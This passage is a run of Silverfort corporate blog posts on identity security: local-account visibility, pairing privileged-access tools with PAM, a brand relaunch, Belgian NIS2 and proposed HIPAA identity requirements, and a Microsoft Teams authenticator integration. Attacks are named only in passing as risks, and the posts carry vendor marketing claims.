mission to address a glaring—and growing—weakness we saw years ago in the security industry: identity. Determined to close this gap, the founding Silverfort team pioneered unique, patented Runtime Access Protection (RAP) architecture, which connects seamlessly to an organization’s existing identity stack. It provides unparalleled visibility into all identities and environments, leverages AI for adaptive authentication and threat detection, and even protects what used to be unprotectable, like non-human identities (NHIs), legacy systems, and command-line tools.   Over the last several years, we have worked continuously to build the identity security platform companies deserve. Unlike other solutions that solve one piece of the security puzzle or require overly complicated maintenance and deployments, Silverfort breaks down silos to eliminate security gaps and blind spots with one easy-to-deploy platform. The result? Identity security without limits. The Silverfort Identity Security Platform is the only solution that truly goes everywhere to deliver unparalleled protection, context, and visibility, without compromising on productivity. Today, over 1,000 organizations worldwide trust us to protect all identities, all resources, and all environments, all the time—and we look forward to seeing that number grow as we continue to take identity security where it has never gone before. Thank you to Fast Company for the recognition, and congratulations to the team that got us here. This is identity security done right. --- - Published: 2025-03-11 - Modified: 2025-03-12 - URL: https://www.silverfort.com/blog/local-accounts-unlocked-how-silverfort-empowers-security-teams-with-end-to-end-visibility/ Have you ever thought how many accounts in your environment operate outside of your visibility and control? One of the biggest identity security blind spots, often ignored by organizations but frequently used by attackers – is Local Accounts. Unlike domain-based accounts that security teams can easily detect and monitor, local accounts are left in the dark with limited to no visibility into their activity and privileges. This gap has become such a critical issue that the FBI recently issued a warning, urging organizations to disable local administrator accounts to reduce the risk of cyberattacks. In this blog, we’ll explore the different security risks posed by local accounts, and how Silverfort’s new local authentications visibility feature helps organizations to close the blind spot. Understanding local accounts: what they are and how they work Local accounts exist in 2 main types: local user accounts and local administrator accounts. Let’s describe each type in more detail: Local user accounts These are standard accounts with limited access permissions, typically used for basic access to an endpoint. Local users can log in and operate a system but lack administrative privileges to make any system-wide changes. Local administrator accounts These accounts have full control over an endpoint, allowing users to install software, modify system settings and create new accounts. Built-in local admin accounts (for instance, default Microsoft Windows “Administrator” account) are often under high risk as they can be exploited by attackers for compromise and privilege escalation. While domain accounts are centrally managed through Active Directory (AD) or an Identity Provider (IdP), local accounts exist only on individual endpoint. From an identity management perspective, the key difference between local and domain accounts is who manages them: Local accounts exist and are controlled on the individual endpoint. The user has full control on the system, including privilege access to critical settings, with no visibility from the security teams. Domain accounts, on the other hand, are managed centrally by domain administrators within Active Directory (AD) or an Identity Provider (IdP). Security teams have more visibility into domain accounts and the ability to enforce security controls on each user, with specific policies and restrictions configuration. Local accounts are often used for administrative tasks or legacy systems to provide access to a specific computer or device, but lack of monitoring and advanced security controls offered by domain-based accounts. The hidden risks of local accounts From a security perspective, local accounts by themselves won’t cause major security risks. But not managing them properly can have serious impact on the organization. Main of these risks are lack of visibility, limited centralized management, and weaker security controls. These challenges make local accounts a prime target for attackers looking to move laterally and escalate privileges undetected. Let’s focus on the identity security risks of local accounts in more detail: Lack of visibility: a blind spot in authentication monitoring One of the biggest risks of local accounts is that security teams can’t see what they can’t track. Unlike domain-based authentications, which are centrally logged and stored, local accounts’ activities are isolated into individual endpoints and do not have any records in AD or IdP logs. This means that any malicious activity, including failed logins, unusual access patterns or compromised credentials, makes it nearly impossible to detect it before it’s too late. Limited centralized management: a security and operational nightmare Local accounts are stored outside of the directory-based identity management scope. And security teams struggle not only on enforcing policies but even on tracking who has access to what. Many organizations rely on default passwords or static credentials for local accounts without proper credential rotation, which increases the risk of unauthorized access. Without any central authentications management, organizations have fragmented security controls that attackers can easily exploit for compromise. Weaker security controls: an open door for attackers Local accounts are rarely secured with strong security controls, like Multi-Factor Authentication (MFA) or other security controls, resulting in an easy target for attackers. Once a local account is compromised, it can be used to escalate privileges or move laterally across the environment without triggering any security alerts. This makes local accounts a critical blind spot in organization’s identity security posture. How Silverfort enables local accounts visibility With Silverfort you can now enhance your visibility into local accounts authentications, starting from Silverfort for Windows Logon version 2. 1. 3. Screenshot: Silverfort’s authentication logs screen provides enhanced visibility for local accounts When a local user accesses a Windows machine with Silverfort for Windows logon installed, the authentication will be recorded with the auth type “Local”, and you will gain complete visibility into these access attempts from Silverfort Logs screen by filtering by Auth type = “Local”. Video: Example of how to filter local user authentications in Silverfort's logs screen This new product capability allows you to track local logons for Windows. By filtering local account access attempts, you can quickly identify any malicious activities, including potential credential misuse. Shining a light on local accounts: the first step to protection Local accounts have always been seen as a security blind spot which attackers can utilize to create an easy entry to compromise an environment and stay unnoticed. Without visibility into the accounts’ authentication activities, you could not detect or respond to any of these malicious activities before they escalate. With Silverfort’s real-time visibility into local accounts’ authentications, you can finally unlock new hidden layer of identity security from being completely unseen to monitor, track and investigate these identities. This is a solid ground to start towards complete security and protection of local accounts. Ready to explore hidden local accounts in your environment? If you are an existing customer, please reach out to your customer success manager or schedule a call with one of our experts --- - Published: 2025-03-06 - Modified: 2025-03-10 - URL: https://www.silverfort.com/blog/how-pas-and-pam-work-together-to-protect-privileged-admin-credentials/ Admin accounts are undoubtedly the ultimate prize for attackers when it comes to privileged users. These accounts are the most privileged users who hold the keys to the kingdom, having the ability to grant access to all systems, data, and core infrastructures of the organization. In the event that an account is compromised, an attacker will be able to move laterally across an organization without being detected. It was believed that traditional security approaches were sufficient to protect admin accounts until recently. However, with the development of new attack methods and the evolution of attack surfaces, securing these accounts' credentials requires a more modern and proactive approach. To prevent attackers from attempting to compromise admin credentials, organizations must change their mindset from a reactive to a real-time approach. In this article, we’ll explain the different security implications of admin users, the key difference between Privileged Access Management (PAM) and Silverfort Privileged Access Security (PAS) when it comes to protecting admin accounts, and how PAM & PAS work together to provide complete protection coverage of all privileged admin accounts. Security implications of privileged admin accounts Typically, privileged admin accounts have elevated permissions over critical systems within an organization, including identity infrastructures, databases, domain controllers, etc. The security implications are many, but let's examine the risk of compromising admin credentials from a security perspective in this case. When admin credentials are compromised, attackers leverage them to run lateral movement attacks where attackers escalate privileges and execute advanced persistent threats (APTs) without being detected. As opposed to standard user accounts, admin accounts can bypass various security controls in most organizations, allowing attackers to keep a foothold in a compromised environment without being detected. As a result of an attacker exploiting compromised passwords, data can be exfiltrated, ransomware can be deployed, or authentication techniques can be modified to create backdoors into the network. For example, in an Active Directory (AD) environment, the compromise of a Domain Admin account can lead to a full domain takeover, enabling adversaries to forge Kerberos tickets (Golden Ticket attacks), create rogue admin accounts, or disable MFA protections. Due to the legitimate nature of their activities, detecting the misuse of privileged admin accounts is challenging. Although traditional security and SIEM solutions provide logs, it will be difficult to distinguish between legitimate admin actions and malicious activity. Organizations are being forced to rethink how they manage and protect their privileged users as a result of these security implications. Organizations will or already have implemented a PAM project, while others will consider other modern approaches that use real-time prevention and Just-In-Time Access policies. However, which is the best option? Understanding the difference between PAM and PAS To answer the question, what is the best approach for securing privileged admin users, PAM or another approach, there is no simple or easy answer. To gain a better understanding of the approach an organization should take, let us examine the differences between traditional PAM solutions and a more modern approach to privileged access such as PAS. PAM (Privileged Access Management) typically focuses on securing and monitoring credentials, ensuring that privileged accounts are properly managed, rotated, and controlled. It often relies on methods like credential vaulting, session management, and role-based access control to enforce least-privilege access to critical systems. However, PAM may still allow broader access to systems, which can be compromised in case of a security breach. Silverfort PAS (Privileged Access Security), on the other hand, is a more modern approach to securing privileged access, which focuses on tightly controlling admin access and limiting the attack surface. PAS works with the concept of tiered user levels (Tier 0, Tier 1, etc. ) to segment their access and minimize the risk of lateral movement or privilege escalation during an attack. In the event of credential compromise, PAS ensures that only certain resources are accessible and with Just-In-Time (JIT) policy capabilities it limits the time frame in which privileged access is granted, further reducing the risk of unauthorized use. PAMSilverfort PASDiscovery & Classification ● Privileged accounts are discovered once and not continuously monitored● Relying on static lists & naming conventions instead of real authentications● Automated discovery and classification of privileged accounts based on actual authentications● Detect and alert when identifying risky cross-tieringPrivileged Accounts Escalation ● Privileged accounts can bypass the PAM proxy and be used from unintended locations ● Accounts can easily exceed their intended purpose● Limit the use of any privileged account to exactly where and how it needs to be used (sources, destinations, protocols – all automatically recommended by Silverfort) ● Block cross-tier authentication for personal and shared accountsReducing The Attack Surface ● Even vaulted accounts remain accessible 24/7, increasing their chances of being compromised even when rarely used● Enforcing least privilege with Just-in-time (JIT) access to reduce the risk of overexposure and unnecessary access● Make privileged accounts completely unusable until they are needed Closing the gaps: Why Silverfort PAS is the perfect companion to PAM While PAM is a solid approach to securing privileged admin accounts, it is not without its challenges. Traditional PAM solutions often struggle to fully discover and manage all privileged users, leaving some unaccounted for and vulnerable to compromise. Additionally, rotating credentials every 30 days is no longer sufficient to counter live attacks, and the credential checkout process can potentially bypass some security measures These security blind spots highlight the need for more real-time protection and that’s where Silverfort PAS comes in. By integrating PAS into the PAM journey, organizations can achieve complete identity security for all privileged users. Now, let’s explore four key ways Silverfort PAS works together with PAM to provide end-to-end protection for admin accounts. Automated discovery of all users Among the most challenging aspects of PAM is the fact that it only secures the accounts it is aware of. The reality is that many organizations have hidden, unmanaged, or even forgotten privileged identities that remain outside the visibility of PAM. This is where PAS fills the gap. While PAM shows you what you know, PAS automatically detects what you are unaware of. By continuously monitoring all authentication activity and identity traffic, PAS detects all privileged users—including non-human identity (NHI), service accounts, shadow admins, and other overlooked identities. Together, PAM and PAS ensure complete visibility and security coverage, leaving no privileged account unprotected. Prevent admin abuse PAM solutions secure privileged credentials by storing them in a vault and enforcing controlled access. However, once an admin retrieves credentials, PAM has limited visibility into how they are used. This creates a risk of credential misuse, whether intentional or due to compromise. PAS enhances PAM’s security by deploying virtual fencing, providing organizations with strong security controls over privileged accounts by restricting their access to only the necessary resources, while automatically blocking unauthorized or excessive access. PAS dynamically enforces least privilege policies by limiting privileged account usage to predefined sources, destinations, and protocols—effectively preventing lateral movement and privilege escalation attacks. Even after credentials are checked out from the vault, PAS ensures that admin activity remains secure, preventing unauthorized actions and reducing the risk of privilege abuse. Together, PAM and PAS provide a proactive defense against insider threats and external attacks. Just-in-Time (JIT) access and Universal MFA protection PAM provides initial security by securely storing and managing privileged credentials, ensuring that only authorized users can access critical systems. It enforces access controls and ensures credential rotation, minimizing the risk of exposure. However, to further reduce risk, organizations need more dynamic, time-sensitive protection. This is where PAS can provide another layer of security with Just-In-Time (JIT) access capabilities. PAS enables organizations to enforce JIT access policies by granting privileged access only when needed, for a limited period, and automatically revoking it once the access is not needed. In addition, PAS enhances PAM’s protection with universal MFA, ensuring that every access request is thoroughly protected, regardless of the system or resource being accessed. Together, PAM and PAS ensure privileged accounts are protected at every stage—providing both initial security and continuous protection. Securing the PAM journey During the PAM deployment journey, privileged accounts often face periods where they are not fully protected with security controls, leaving them vulnerable to compromise. While PAM ensures privileged accounts are secured once fully implemented, the process of deploying and integrating PAM can expose security gaps, particularly for admins who are configuring and managing the solution. PAS adds a critical layer of protection throughout the entire PAM journey, securing admin accounts from day one from potential threats during the deployment phase. By monitoring authentication activity in real-time and enforcing JIT and least privilege policies from the start, PAS ensures that admins are continuously protected against privilege escalation and unauthorized access, even before PAM is fully operational. This end-to-end protection reduces the risk of compromise and strengthens the overall PAM deployment process Proactive protection for privileged admin accounts: Combining PAS and PAM It is more critical than ever to secure privileged admin accounts since these accounts have access to an organization's most sensitive systems and data. Even though traditional PAM solutions provide a foundation for security, they tend to leave gaps that make admin accounts vulnerable to compromise. By implementing Silverfort PAS with PAM, organizations can achieve complete identity security for privileged accounts, addressing security blind spots that PAM alone cannot cover. From automated discovery and virtual fencing to Just-In-Time (JIT) access and continuous security throughout the PAM deployment journey, PAS enhances PAM’s security capabilities to provide real-time protection for all admin accounts. Looking to learn how you can change the way you secure privileged access? Contact one of our experts today. --- - Published: 2025-02-27 - Modified: 2025-02-27 - URL: https://www.silverfort.com/blog/unveiling-silverforts-new-brand-identity-security-done-right/ No more patchworks and one-offs—break down the traditional identity silos and secure without limits. Today marks a new era for identity security, as we unveil Silverfort’s new brand. This is more than a design refresh—it’s a reaffirmation of our vision and our commitment to taking identity security further. We are building the identity security platform the industry deserves, one that breaks free from the complexity, limitations, and compromises that turned identity into the weakest link in enterprise security. Our new brand reflects this mission, reinforcing our dedication to protecting identity in ways that were never possible before. More than 1,000 enterprises trust Silverfort to secure their identities end-to-end, and our gross customer retention rate remains high at 94%. Our product team continues to innovate at an unmatched pace, consistently delivering disruptive new products and powerful features. We’ve raised more than $220M in funding from leading investors. We've grown to over 450 team members worldwide, with revenue increasing by close to 100% year over year for the last 5 years. I couldn't be prouder of this incredible team and the impact we are making.   Thank you. Our journey: To where identity security has never gone before  Our journey began with a mission to address a glaring weakness we saw years ago in the security industry: identity. A weakness that has only been growing since.   Throughout many years in offensive security, cryptography, and artificial intelligence, my co-founders and I saw identity security isn't just an element of cybersecurity—it's one of the most critical conditions for success. Working in national security instilled a mindset of testing the boundaries of what's possible, and we applied this same mentality to solving the identity security problem. In the first couple of years, we failed a lot. In fact, there were several points when we feared that what we were trying to create might be technically impossible.   Enterprises needed a solution that could, in real-time, analyze every authentication and access request to every single resource, determine whether it’s malicious, and intervene in real-time to stop it if needed. Identity teams wanted to unlock complete visibility into every identity—human or machine—across their hybrid environments for better posture management. SOC teams dreamed of having a “kill switch” during a breach, turning off authentications to reduce the blast radius and catch the attacker. Customers wanted a way to protect their cloud identities, “forgotten” legacy systems, air-gapped networks, or regularly used command-line tools. Never-ending projects to secure privileged accounts wore teams down and yet left most accounts unprotected. For years, enterprises managed identity through a patchwork of on-premises identity management tools, multiple cloud identity providers (IdPs), and a mix of bespoke identity security solutions. The problem? These tools were built in silos—many long before cloud infrastructure and modern attack techniques existed—creating critical security gaps and blind spots. This outdated approach forces enterprises to make a difficult choice: prioritize security or productivity but never achieve both. But we found a way.   Our innovation: Runtime Access Protection (RAP)  With identity security as our sole focus and mission, and after years of research and development, we found a way to deliver end-to-end identity security—securing every dimension of identity. We can protect every type of identity, whether human or machine, on-premises or in the cloud. We extend identity protection everywhere, even to critical systems that were previously hard or impossible to defend, such as legacy systems, command-line tools, IT/OT infrastructure, and air-gapped networks.   Our approach provides complete visibility and risk-aware context, empowering you to make smarter decisions about your identity attack surface. We uncover identity exposures —misconfigurations, weak authentication protocols like NTLMv1, and many other weaknesses— and guide you toward remediation to strengthen your security posture. And when active threats emerge, our threat detection & response capabilities, plus our unique ability to intervene in access attempts while they are happening, ensure you can stop attacks before they cause damage. We can even protect privileged accounts and non-human identities (NHIs) without having to modify them at all and do it at the largest scale. All this is possible due to our patented technology: Runtime Access Protection (RAP) which natively integrates with all the different pieces of your IAM infrastructure to continuously protect all identities, environments, and resources. Once integrated into your IAM infrastructure, RAP forwards any access request to Silverfort’s policy engine, where we analyze the request and trigger inline security controls if needed. We return our verdict on the legitimacy of the request to the IAM infrastructure, and the identity provider grants or denies access based on our ruling. The result is identity security with end-to-end visibility, cross-platform analysis for exposure management, and inline identity protection. Our technology brings identity security everywhere—and I really mean everywhere.   Our new brand: Welcoming a new era of identity security without limits  As part of our new brand, we unveiled a new logo. Our new logo and brand embody our mission, to break free from the old approach of patchworks, one-offs and point solutions, and deliver identity security without limits.   Identity security is finally getting the attention it deserves. People realize that a single, end-to-end approach to identity security is no longer a nice-to-have—it's a must. Organizations can no longer afford fragmented solutions that create security gaps, slow response times, and increase operational complexity.   Organizations must go beyond just managing identities—it's now about proactively securing them, in real time.   Identity deserves its own security platform.   Our Future: Identity is everything and must be secured   We are breaking down the traditional barriers between IAM, security and compliance to protect every identity everywhere with unparalleled visibility, intelligence and active protection—all in a single platform that can be implemented rapidly.   By staying ahead of emerging identity threats, enterprises can finally rise to the challenge of securing access, detecting identity risks before they cause damage, and achieving real-time, inline enforcement across all users, systems and environments. As identity threats continue to evolve with new techniques and AI-powered automation, and as organizations attempt to consolidate tools and overcome operational bottlenecks, Silverfort offers the first clear path to the future of identity security. This is identity security done right. Learn more about our platform. --- - Published: 2025-02-09 - Modified: 2025-02-26 - URL: https://www.silverfort.com/blog/identity-security-explained-in-the-belgian-nis2-law/ Belgium was the first European country to transpose NIS2 into national law, in April, through its “NIS2 law”. This set them apart, in a positive fashion, from their French, Dutch, and German neighbours, all late in the transposition process due to political instability. In parallel, the CCB (Center for Cybersecurity Belgium), the local agency in charge of enforcing NIS2 compliance, has released the Safeonweb@work initiative. This sets out a detailed and practical framework all the measures that are required by the law, based an organisation’s size and sector of activity. Having poured over the CCB’s recommendations, this blog post analyses the main requirements that pertain to identity security, which all Belgian “essential” and “important” entities will need to implement. We will also highlight how Silverfort can help these organisations in achieving compliance with these measures. The CCB’s approach draws mainly from the NIST CSF framework, which identifies 5 core functions for securing information systems: identify, protect, detect, respond, and recover. The NIS2 law in Belgium requires an investment in each function proportional to the size and importance of every entity. We also find in the Safeonweb@work framework numerous references to the ISO27001 and ISO27002 standards, which establish effective measures to design and strengthen the security of information systems. These standards have achieved worldwide recognition and constitute a robust basis upon which any organization can build a cybersecurity programme. Protection Requirements of NIS2 Each of the 5 functions in the NIST framework has an identity component. In the CCB’s recommendations, however, the chapters around protection and detection are clearly the most relevant. The former even includes an entire section (PR. AC) dedicated to identity management, authentication, and access controls. Identity experts will find in it the main measures pertaining to securing directories and users. It is worth highlighting the fact that at the “basic” assurance level in annex A of the Safeonweb@work document, which applies to all entities subject to NIS2 regardless of their size or level of important, more than half of the “key” measures come precisely from the PR. AC section. It is therefore difficult to emphasize the extent to which identity weighs into the CCB’s framework for securing information systems. We therefore find in these key measures required for all entities subject to NIS2: Appropriate management for users and credentials, encompassing provisioning and revoking access rights, regular audits, strong authentication on critical systems, and detection of suspicious behaviours (PR. AC-1). Securing remote accesses and SaaS applications with MFA (PR. AC-3). Implementing least privilege in access rights, particularly towards sensitive or critical systems, and separating personal and administrative accounts (PR. AC-4). Network security and the segmentation of critical systems (PR. AC-5). Additional measures are also mandated for entities under the “Important” or “Essential” assurance level (in annexes B and C), including requirements around identification and governance for remote accesses (PR. AC-3), stricter monitoring for connections and communications around the key external and internal boundaries (PR-AC-5), a documented risk assessment, and the implementation of access controls proportionate to the risk of each transaction (PR. AC-7, at the “essential” assurance level only). Concretely speaking, what do these measures imply? The answer varies depending on the size and level of importance of each entity. But overall, the CCB’s approach is pragmatic, only requiring tools that are already commonplace in business environments (IAM platforms, firewalls, MFA). Some additional investment will probably be necessary for essential entities operating legacy systems, since those aren’t natively compatible with modern security products. Other than that, only laggard companies from a cybersecurity standpoint will truly need to acquire new technologies. Beyond the PR. AC section, access controls also appear in measures designed to protect data-at-rest (PR. DS-1), prevent the loss, misuse, damage, or theft of organizational assets (PR. DS-3) and data leaks (PR. DS-5). Regular audits are also recommended – with Active Directory explicitly mentioned (PR. DS-5) – to detect privilege misconfigurations which could open an attack pathway. Finally, requirements around maintaining the integrity of critical systems (PR. DS-6) and mitigating the risks surrounding remote maintenance (PR. MA-2) probably imply session recording for privileged accesses. Detection Requirements of NIS2 The “Detect” function in the Safeonweb@work initiative also includes multiple articles related to the field of identity. Unsurprisingly, these mirror quite neatly the recommendations that appeared in the “Protect” function. Aggregating event data (DE. AE-1 and 3) appears first and foremost as a “key” measure, with particular attention given to critical systems. This data should emanate from multiple sources, including physical accesses and user/administrator reports. Organizations are particularly called upon to monitor critical systems for unauthorized local, network, or remote connections (DE. CM-1), both from internal personnel and external service providers (DE. CM-3, DE. CM-6, et DE. CM-7). These efforts imply surveillance tools on the network and endpoint level. Some might even suggest going a step further with comprehensive protection platforms encompassing access points and domain controllers, thereby combining EDR with ITDR. Overall, these measures reflect the requirements put forward in the “Protection” function against malicious activities (PR. DM and PR. MA), designed to block data leaks or damage. How can Silverfort help with NIS2 compliance? Silverfort can help comply with many of these requirements. In just 1 month, and without any heavy changes to your infrastructure, our platform can: PR. AC-1 :Identify all privileged accounts within your multiple directoriesAudit all your service accounts and hybrid accountsIdentify shadow adminsIdentify shared accountsIdentify stale accountsIdentify accounts with old passwords Protect accesses to critical systems, including legacy or on-prem, with MFA (compatible with Microsoft Authenticator, Okta, Ping, Duo, Yubico, and more) or with dynamic risk-based policies Silverfort's ITDR screen detects a Shadow Admin, highlighting hidden privileged access risks in real time. PR. AC-3 :Alert or block any suspicious remote access attempt Protect remote accesses (RDP, SSH), command-line interfaces (Powershell, PsExec, WMI), and SaaS or on-prem applications with MFA PR. AC-4 :Identify and monitor all generic and shared accountsIdentify and monitor all authentications to file shares, servers, applications, databases, etc. even when on-premIdentify and monitor all privileged accounts, including shadow admins and domain administratorsDetect and/or block all authentications breaching tiering principles (such as personal accounts or devices for administrative tasks, or vice-versa)Detect and/or block all authentications in breach of least privilege Place adaptive conditional access policies for administrative accounts and tools which take into account geographic, timing, or behavioural factors PR. DS-5 :Establish granular access policies to all critical systems and applications, even on-premMonitor and block all malicious accesses to critical systems, including on-prem Audit Active Directory to detect privilege creep and misconfigurations PR. DS-7 :Block authentications that breach the integrity of the production or testing environments Restrain privileges of administrative accounts to specific environments or applications Example policy to stop lateral movement by implementing least privilege for remote management of Application X servers in PROD.   PR. MA-2 :Monitor and restrain the access rights of external providers to specific environments or applicationsProtect remote accesses from external providers or partners with MFA Block all attempts to hijack external provider or partner accounts or any unusual behaviours Example policy in Silverfort to trigger MFA with Tier 1 accounts for remote access DE. AE-1 :Log all Active Directory authentications, including their sources, destinations, protocols, and timestamp Calculate a dynamic risk score for all Active Directory accounts and authentications DE. CM-1 :Detect and block any unauthorized authentication in Active Directory or in any other compatible directory (PAM, RADIUS, Entra ID, Okta, Ping... ). Detect and alert when human or service accounts display unusual behaviour DE. CM-7 :Detect and block any unauthorized personnel access to critical systems Detect and block any unauthorized software access to critical systems Is it worth exceeding expectations? Often, the Safeonweb@work initiative suggests additional measures that would contribute to securing information systems (through the regular use of the word “Consider”), without necessarily making them compulsory. It also omits some simple and common hygiene measures that other agencies, such as the ANSSI in France, have more forcefully insisted upon. In this category, we can mention the tiering of critical systems or users. The CCB requires using separate accounts for personal and administrative tasks (PR. AC-4) as well as network segmentation (PR. AC-5). But it does not mandate dedicated workstations (PAW) or operating systems for administrative actions, which would help avoid certain kinds of attacks such as Pass-the-Hash. Another example: the CCB recommends using service accounts for automated processes (PR. AC-1). However, it does not forbid administrators from running automated tasks using their own accounts, nor does it prohibit using service accounts for actions that deviate from their intended purpose. These might be missed opportunities for Belgian organizations, particularly “essential” entities under NIS2, which future attackers might successfully exploit. The CCB clearly tried to weigh the security benefits, and the financial or operational costs involved in each decision it made. The result remains nonetheless robust, and clearly raises the bar for many local organizations which had hitherto neglected their security posture. However, it will not immunize the country against the more sophisticated cyber attacks which have multiplied in recent years. Want to learn more about how Silverfort can help you address the identity security aspects of NIS2? Schedule a call with one of our experts or fill out this form for a pricing quote. --- - Published: 2025-02-03 - Modified: 2025-04-02 - URL: https://www.silverfort.com/blog/a-critical-step-forward-for-healthcare-breaking-down-the-proposed-hipaa-security-rule-framework-updates/ Healthcare is one of the most targeted sectors by malicious actors, with the number of breaches growing consistently year on year. Despite the common security risks affecting healthcare environments and numerous headline-hitting data breaches, healthcare remains under-resourced to defend against the increasing number of cyberattacks.   In early January 2025, HIPAA proposed a set of updates to its HIPAA Security Rule framework to provide more granular security regulations. This is a much-needed change for the industry as it will force every healthcare organization to address its security risks head-on. But let’s be honest: while the proposed changes in HIPAA are a step in the right direction, it’s far from a complete solution, and many of the new guidelines will challenge under-resourced organizations to comply.   Why is the HIPAA framework adding new regulations?   The HIPAA Security Rule has undergone a few major revisions since its inception, with the most recent occurring in the early 2000s. Since then, only minor updates have been applied to the framework, none of which moved the proverbial needle from a security perspective. Furthermore, the current security HIPAA guidelines were more recommendations than requirements in the framework.   In short, it was time for an overhaul of the security guidelines, especially where they related to identity security. It's also worth noting that the updates didn’t come out of nowhere: they were a direct response to the growing number of attacks in the healthcare industry in recent years. The common denominator with attacks in this sector was the use of compromised credentials and undetected lateral movement.   As a result of this continuous and successful breach of healthcare providers, the HIPAA regulators came out with a strong and clear message: enough is enough.   These new proposed guidelines aim to tackle the sector’s lack of security controls and posture. They’re also a serious reality check for an industry struggling to keep up with security best practices. Key proposed changes to the HIPAA framework On January 6th, 2025, the Department of Health and Human Services (HHS) unveiled a comprehensive proposal for updating the HIPAA framework, marking a significant step towards enhancing the security and privacy of electronic protected health information (ePHI). According to OCR’s announcement, the proposed rule seeks to “improve cybersecurity and better protect the U. S. healthcare system from a growing number of cyberattacks” and “better align the Security Rule with modern best practices in cybersecurity. ”  Let's take a closer look at the proposed guidelines that specifically address identity security in the updated HIPAA Security Rule framework.   1. Compromised credentials and MFA  For all access points to electronic protected health information (ePHI), organizations will be required to implement MFA protection. This measure aims to mitigate risks associated with compromised credentials, reducing unauthorized access.   2. Incident response   Following the proposed updates, all policies, procedures, plans and analyses related to incident response must be documented in writing. A comprehensive incident response plan, including procedures for reporting incidents and restoring systems within 72 hours of a breach, must be developed by covered entities. Additionally, organizations must conduct annual security testing to ensure the effectiveness of the organization's security controls.   3. Risk analysis   To conduct security risk analyses, the HHS proposed more detailed requirements which include maintaining a written assessment that reviews an asset inventory and network map, identifies potential threats to protected health information (PHI), and evaluates each threat's risk level. Organizations will benefit from this proactive approach by better understanding and mitigating security threats and risks.   4. Asset inventory  Healthcare organizations will be required to develop an asset inventory and network map that tracks the movement of ePHI throughout their systems. This comprehensive mapping requirement will help identify misconfigurations and security risks, ensuring all assets are adequately secured against unauthorized access.   5. Encryption   All PHI must be encrypted both at rest and in transit, reflecting a shift towards mandatory encryption practices rather than optional recommendations. This change highlights the critical importance of securing sensitive patient information from unauthorized access during storage and transmission.   6. Vulnerability scanning and penetration testing  Organizations will need to conduct vulnerability scans every six months and perform penetration testing at least once a year. These assessments will be crucial for identifying weaknesses in security measures before they can be exploited by malicious actors.   7. Compliance audits  Covered entities must conduct a compliance audit at least once a year to verify that technical controls are implemented effectively. Organizations must document this audit to prove that they have adhered to the updated security standards.   8. Security awareness training  The proposed rule includes new training requirements for workforce members regarding identifying and reporting security incidents, securely accessing electronic systems, and understanding HIPAA policies. Upon access to IT systems, training must be completed within 30 days and must be renewed annually.   The hard truth for healthcare organizations  As significant as these updates are, they also highlight the challenges faced by under-resourced healthcare providers. Complying with these regulations requires the right amount of resources (IT team & investments) in technology and processes that many healthcare providers tend to struggle with. Non-compliance with HIPAA’s new proposed framework could lead to regulatory penalties as well as the fallout from a security breach. By implementing stronger security controls and enhancing their overall security posture, healthcare organizations can take proactive steps to align with HIPAA's proposed new security guidelines, which call for more stringent and extensive security measures.   Proactive security approach will lead to easier compliance The proposed changes to the HIPAA framework are a necessary step toward helping the healthcare industry in its fight against cybercriminals. By addressing the different security risks and threats in the sector, HIPAA is providing a clear roadmap for reducing risk. However, achieving compliance will require significant effort, particularly for under-resourced organizations. Healthcare providers must take a proactive approach to security and act now to align with these changes, ensuring they are not only compliant but also resilient. Want to learn more about how Silverfort can assist you in complying with HIPAA requirements? Schedule a call with one of our experts or watch our on-demand webinar to make sure your organization is prepared, protected, and compliant. --- - Published: 2025-01-28 - Modified: 2025-06-16 - URL: https://www.silverfort.com/blog/microsoft-teams-and-silverfort-bridging-authentication-and-enhancing-identity-incident-visibility/ While hybrid environments are the new norm, they bring with them a unique set of security challenges, like fragmented systems, siloed authentication flows, and sub-optimal end-user experiences. As a result, the process of enforcing security controls turns into a daunting task – even for the most advanced organizations. In this blog, we’ll explore how Silverfort’s integration with Microsoft Teams addresses the challenge of securing hybrid environments with enhanced visibility capabilities and real-time alerts on any authentication request in your environment. Why end-to-end visibility is essential for security teams On-prem resources and cloud applications are often siloed, which creates operational bottlenecks for security teams and makes it even more difficult to secure all authentication flows. Not managing both environments correctly can increase the risk of exposed passwords, potentially leading to misuse and credential compromise. To mitigate these risks, organizations must strike a balance between strong security controls and operational efficiency. Enforcing effective security controls while maintaining a frictionless end-user experience is no mean feat. Luckily, there are things you can do to make it easier. Firstly, a proactive approach to visibility, with centralized monitoring of all authentications and other user activities at its core, is vital to enforcing strong access policies across your organization – and detecting any malicious threats before they can become an issue. Furthermore, organizations need real-time alerts for high-risk incidents or risk delaying the incident response process. Without these timely notifications, security teams may not become aware of any malicious activity until the damage has been done. No more risk visibility blind spots for security teams Silverfort Authenticator for Microsoft Teams Silverfort customers can now use the Microsoft Teams application to securely approve authentication requests, providing an alternative to the Silverfort MFA desktop application. Use our SSO bridging functionality to receive real-time alerts for all authentication requests in your hybrid environment without installing the Silverfort desktop application on your workstations. With enhanced authentication flows through Silverfort, you’ll get efficient, streamlined access to any resource within your defined access policies. In addition to bridging identity flows, the Silverfort Authenticator app for Microsoft Teams enables users to authenticate using FIDO2 tokens, One-Time Passwords (OTP), and Just-in-Time (JIT) access requests for privileged accounts. These extended capabilities allow users to securely approve access directly within Microsoft Teams, reducing the dependency on the Silverfort Desktop Application. With Silverfort’s enhanced authentication flows, you’ll get efficient, streamlined access to any resource within your defined access policies. How does Silverfort Authenticator for Microsoft Teams work? Video: Example of real-time alert for authentication request in your hybrid environment that is sent through Silverfort Authenticator App in Microsoft Teams Silverfort embeds Identity Bridge flows, FIDO2, OTP and JIT authentications directly into Microsoft Teams’ environment and seamlessly bridges any type of authentication request. When an Identity Bridge policy is triggered, the Silverfort Authenticator app in Teams opens a browser to initiate the SSO request to verify the user’s identity. After the user accepts the request, the bridge session is established, and the user gains secure access to a specific resource within the organization’s environment. When FIDO2 or OTP-based policies are triggered, users will see a corresponding prompt within Microsoft Teams to complete verification with the configured method. For privileged accounts, secured by JIT access policies, Teams delivers a just-in-time approval request to verify access at the time of need. These authentication events are securely processed within the Microsoft Teams chat interface, using Silverfort’s centralized policy enforcement engine. Silverfort’s risk and incident notifications for Microsoft Teams Silverfort’s risk and incident notifications integration with Microsoft Teams offers security teams real-time end-to-end visibility into security events happening in your environment based on our analysis. This integration allows you to receive real-time alerts in your Microsoft Teams app on security events with different risk levels, including new incident detection and changes to entity risk levels. With Silverfort for Microsoft Teams, you gain all the necessary insights for a rapid, informed risk prioritization and mitigation process. How does Silverfort’s risk and incidents notifications integration with Microsoft Teams work? To set up this integration, you will need to configure Microsoft Teams to accept 